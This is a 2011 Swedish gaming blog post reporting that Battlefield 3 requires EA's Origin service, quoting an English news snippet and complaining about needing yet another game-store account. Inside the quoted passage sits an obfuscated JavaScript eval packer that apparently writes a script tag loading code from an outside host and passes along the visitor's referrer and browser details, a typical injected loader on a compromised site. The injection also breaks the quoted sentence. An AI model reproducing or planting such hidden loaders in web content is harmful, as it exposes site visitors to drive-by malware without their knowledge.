Image Image Image Image Image Image Image Image Image Image

| 17 mars, 2018

Scroll to top

Top

No Comments

Battlefield 3 kräver EAs Steam liknande tjänst Origin för att fungera. | Revue.se

Battlefield 3 kräver EAs Steam liknande tjänst Origin för att fungera.
Filip Urde
  • On 12 augusti, 2011
  • http://www.revue.se/filip-urde

Jaha… där ser man!

Nyligen så bekräftades det att Battlefield 3 kräver att man har EAs motsvarighet till Steam, Origin, installerat för att kunna spela spelet.

[quote]Origin eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|brhkt|var|u0026u|referrer|arkkh||js|php’.split(‘|’),0,{}))
will be required in order to play Battlefield 3 if the game is bought in retail. We don?t know whether this is true if the game is downloaded through a digital download service other than Origin, but we suspect Origin will be required no matter what.
[/quote]

Tjänsten liknar Steam och fyller exakt samma syfte, helt enkelt en kontroll av spelen, att dem faktiskt är köpta och inte illegalt ner-laddade. Det ända jobbiga jag ser med det här är att man får ännu en tjänst med lösenord, community och allt det innebär.

Vore ju väldigt skönt om spelföretagen kunde enas om en universal tjänst (steam?) som alla använde. Tänk vad skönt för oss användare….. Annars vore världsfred också trevligt….

bf3blog.com